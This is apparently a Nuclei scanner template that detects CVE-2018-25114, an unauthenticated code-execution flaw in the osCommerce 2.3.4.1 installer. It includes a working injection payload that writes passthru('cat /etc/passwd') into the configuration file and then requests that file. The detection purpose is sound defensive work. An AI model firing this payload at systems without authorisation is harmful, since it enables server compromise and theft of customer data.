id: CVE-2018-25114

info:
  name: osCommerce 2.3.4.1 - Remote Code Execution
  author: Suman_Kar
  severity: critical
  description: |
    osCommerce Online Merchant 2.3.4.1 contains a remote code execution vulnerability caused by an insecure default configuration and missing authentication in the installer workflow, allowing unauthenticated attackers to execute arbitrary PHP code via install_4.php. Exploitation requires that the /install/ directory remains accessible after installation.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code by exploiting the insecure installer workflow, leading to complete compromise of the e-commerce platform and access to customer data.
  remediation: |
    Remove the /install/ directory after installation and upgrade to a patched version of osCommerce.
  reference:
    - https://www.exploit-db.com/exploits/50128
    - https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
    - https://www.exploit-db.com/exploits/44374
    - https://www.vulncheck.com/advisories/oscommerce-installer-unauth-config-file-injection-php-code-execution
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cve-id: CVE-2018-25114
    cwe-id: CWE-94
    epss-score: 0.78786
    epss-percentile: 0.99077
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2018,rce,oscommerce,edb,vuln,vkev

http:
  - raw:
      - |
        POST /install/install.php?step=4 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
      - |
        GET /install/includes/configure.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205b6d9650f88262d053e4ba9b6d3e205aa7713320de14279ce02f10eb995cc86c022100f0027af2d90217d8a12b0289f4f9a58cc72ce35f5d0143ad62a4bb174ab299ca:922c64590222798bb761d5b6d8e72950